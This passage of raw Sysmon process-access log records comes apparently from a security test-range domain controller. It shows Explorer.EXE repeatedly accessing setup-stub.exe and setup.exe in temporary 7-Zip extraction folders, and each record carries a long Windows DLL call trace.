\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.